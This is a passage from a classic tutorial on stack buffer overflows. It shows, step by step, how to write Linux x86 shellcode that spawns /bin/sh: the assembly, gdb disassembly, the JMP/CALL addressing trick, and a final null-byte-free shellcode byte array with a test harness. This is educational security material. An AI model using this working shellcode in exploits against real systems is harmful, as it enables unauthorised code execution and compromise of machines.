So as we can see there is not
much to the execve() system call. All we need to do is:
a) Have the null terminated string
"/bin/sh" somewhere in memory. b) Have the address
of the string "/bin/sh" somewhere in memory followed
by a null long word. c) Copy 0xb into the EAX register. d) Copy
the address of the address of the string "/bin/sh"
into the EBX register. e) Copy the address of the string "/bin/sh"
into the ECX register. f) Copy the address of the null long word
into the EDX register. g) Execute the int $0x80 instruction.
But what if the execve() call
fails for some reason? The program will continue fetching instructions
from the stack, which may contain random data! The program will
most likely core dump. We want the program to exit cleanly if
the execve syscall fails. To accomplish this we must then add
a exit syscall after the execve syscall. What does the exit syscall
looks like?
exit.c ------------------------------------------------------------------------------
#include <stdlib.h>
void main() { exit(0); } ------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c [aleph1]$ gdb exit GDB is
free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see
the conditions. There is absolutely no warranty for GDB; type
"show warranty" for details. GDB 4.15 (i586-unknown-linux),
© 1995 Free Software Foundation, Inc... (no debugging
symbols found)... (gdb) disassemble _exit Dump of assembler code
for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d
<_exit+1>: movl %esp,%ebp 0x800034f <_exit+3>: pushl
%ebx 0x8000350 <_exit+4>: movl $0x1,%eax 0x8000355 <_exit+9>:
movl 0x8(%ebp),%ebx 0x8000358 <_exit+12>: int $0x80 0x800035a
<_exit+14>: movl 0xfffffffc(%ebp),%ebx 0x800035d <_exit+17>:
movl %ebp,%esp 0x800035f <_exit+19>: popl %ebp 0x8000360
<_exit+20>: ret 0x8000361 <_exit+21>: nop 0x8000362
<_exit+22>: nop 0x8000363 <_exit+23>: nop End of
assembler dump. ------------------------------------------------------------------------------
The exit syscall will place 0x1
in EAX, place the exit code in EBX, and execute "int 0x80".
That's it. Most applications return 0 on exit to indicate no
errors. We will place 0 in EBX. Our list of steps is now:
a) Have the null terminated string
"/bin/sh" somewhere in memory. b) Have the address
of the string "/bin/sh" somewhere in memory followed
by a null long word. c) Copy 0xb into the EAX register. d) Copy
the address of the address of the string "/bin/sh"
into the EBX register. e) Copy the address of the string "/bin/sh"
into the ECX register. f) Copy the address of the null long word
into the EDX register. g) Execute the int $0x80 instruction.
h) Copy 0x1 into the EAX register. i) Copy 0x0 into the EBX register.
j) Execute the int $0x80 instruction.
Trying to put this together in
assembly language, placing the string after the code, and remembering
we will place the address of the string, and null word after
the array, we have:
------------------------------------------------------------------------------
movl string_addr,string_addr_addr movb $0x0,null_byte_addr movl
$0x0,null_addr movl $0xb,%eax movl string_addr,%ebx leal string_addr,%ecx
leal null_string,%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx
int $0x80 /bin/sh string goes here. ------------------------------------------------------------------------------
The problem is that we don't
know where in the memory space of the program we are trying to
exploit the code (and the string that follows it) will be placed.
One way around it is to use a JMP, and a CALL instruction. The
JMP and CALL instructions can use IP relative addressing, which
means we can jump to an offset from the current IP without needing
to know the exact address of where in memory we want to jump
to. If we place a CALL instruction right before the "/bin/sh"
string, and a JMP instruction to it, the strings address will
be pushed onto the stack as the return address when CALL is executed.
All we need then is to copy the return address into a register.
The CALL instruction can simply call the start of our code above.
Assuming now that J stands for the JMP instruction, C for the
CALL instruction, and s for the string, the execution flow would
now be:
bottom of DDDDDDDDEEEEEEEEEEEE
EEEE FFFF FFFF FFFF FFFF top of memory 89ABCDEF0123456789AB CDEF
0123 4567 89AB CDEF memory buffer sfp ret a b c
<------ [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
^|^ ^| | |||_____________||____________| (1) (2) ||_____________||
|______________| (3) top of bottom of stack stack
With this modifications, using
indexed addressing, and writing down how many bytes each instruction
takes our code looks like:
------------------------------------------------------------------------------
jmp offset-to-call # 2 bytes popl %esi # 1 byte movl %esi,array-offset(%esi)
# 3 bytes movb $0x0,nullbyteoffset(%esi)# 4 bytes movl $0x0,null-offset(%esi)
# 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal
array-offset,(%esi),%ecx # 3 bytes leal null-offset(%esi),%edx
# 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl
$0x0, %ebx # 5 bytes int $0x80 # 2 bytes call offset-to-popl
# 5 bytes /bin/sh string goes here. ------------------------------------------------------------------------------
Calculating the offsets from
jmp to call, from call to popl, from the string address to the
array, and from the string address to the null long word, we
now have:
------------------------------------------------------------------------------
jmp 0x26 # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3
bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx
# 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl
$0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2
bytes call -0x2b # 5 bytes .string \"/bin/sh\" # 8
bytes ------------------------------------------------------------------------------
Looks good. To make sure it works
correctly we must compile it and run it. But there is a problem.
Our code modifies itself, but most operating system mark code
pages read-only. To get around this restriction we must place
the code we wish to execute in the stack or data segment, and
transfer control to it. To do so we will place our code in a
global array in the data segment. We need first a hex representation
of the binary code. Lets compile it first, and then use gdb to
obtain it.
shellcodeasm.c ------------------------------------------------------------------------------
void main() { __asm__(" jmp 0x2a # 3 bytes popl %esi # 1
byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx
# 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx #
3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0,
%ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes .string
\"/bin/sh\" # 8 bytes "); } ------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c [aleph1]$
gdb shellcodeasm GDB is free software and you are welcome to
distribute copies of it under certain conditions; type "show
copying" to see the conditions. There is absolutely no warranty
for GDB; type "show warranty" for details. GDB 4.15
(i586-unknown-linux), © 1995 Free Software Foundation,
Inc... (gdb) disassemble main Dump of assembler code for function
main: 0x8000130 <main>: pushl %ebp 0x8000131 <main+1>:
movl %esp,%ebp 0x8000133 <main+3>: jmp 0x800015f <main+47>
0x8000135 <main+5>: popl %esi 0x8000136 <main+6>:
movl %esi,0x8(%esi) 0x8000139 <main+9>: movb $0x0,0x7(%esi)
0x800013d <main+13>: movl $0x0,0xc(%esi) 0x8000144 <main+20>:
movl $0xb,%eax 0x8000149 <main+25>: movl %esi,%ebx 0x800014b
<main+27>: leal 0x8(%esi),%ecx 0x800014e <main+30>:
leal 0xc(%esi),%edx 0x8000151 <main+33>: int $0x80 0x8000153
<main+35>: movl $0x1,%eax 0x8000158 <main+40>: movl
$0x0,%ebx 0x800015d <main+45>: int $0x80 0x800015f <main+47>:
call 0x8000135 <main+5> 0x8000164 <main+52>: das
0x8000165 <main+53>: boundl 0x6e(%ecx),%ebp 0x8000168 <main+56>:
das 0x8000169 <main+57>: jae 0x80001d3 <__new_exitfn+55>
0x800016b <main+59>: addb %cl,0x55c35dec(%ecx) End of assembler
dump. (gdb) x/bx main+3 0x8000133 <main+3>: 0xeb (gdb)
0x8000134 <main+4>: 0x2a (gdb) . . . ------------------------------------------------------------------------------
testsc.c ------------------------------------------------------------------------------
char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() { int *ret;
ret = (int *)&ret + 2; (*ret)
= (int)shellcode;
} ------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c [aleph1]$ ./testsc $ exit [aleph1]$
------------------------------------------------------------------------------
It works! But there is an obstacle.
In most cases we'll be trying to overflow a character buffer.
As such any null bytes in our shellcode will be considered the
end of the string, and the copy will be terminated. There must
be no null bytes in the shellcode for the exploit to work. Let's
try to eliminate the bytes (and at the same time make it smaller).
Problem instruction: Substitute
with: --------------------------------------------------------
movb $0x0,0x7(%esi) xorl %eax,%eax molv $0x0,0xc(%esi) movb %eax,0x7(%esi)
movl %eax,0xc(%esi) --------------------------------------------------------
movl $0xb,%eax movb $0xb,%al --------------------------------------------------------
movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax
inc %eax --------------------------------------------------------
Our improved code:
shellcodeasm2.c ------------------------------------------------------------------------------
void main() { __asm__(" jmp 0x1f # 2 bytes popl %esi # 1
byte movl %esi,0x8(%esi) # 3 bytes xorl %eax,%eax # 2 bytes movb
%eax,0x7(%esi) # 3 bytes movl %eax,0xc(%esi) # 3 bytes movb $0xb,%al
# 2 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes xorl %ebx,%ebx
# 2 bytes movl %ebx,%eax # 2 bytes inc %eax # 1 bytes int $0x80
# 2 bytes call -0x24 # 5 bytes .string \"/bin/sh\"
# 8 bytes # 46 bytes total "); } ------------------------------------------------------------------------------
And our new test program:
testsc2.c ------------------------------------------------------------------------------
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() { int *ret;
ret = (int *)&ret + 2; (*ret)
= (int)shellcode;
} ------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c [aleph1]$ ./testsc2 $ exit
[aleph1]$ ------------------------------------------------------------------------------
More smashing the stack--->>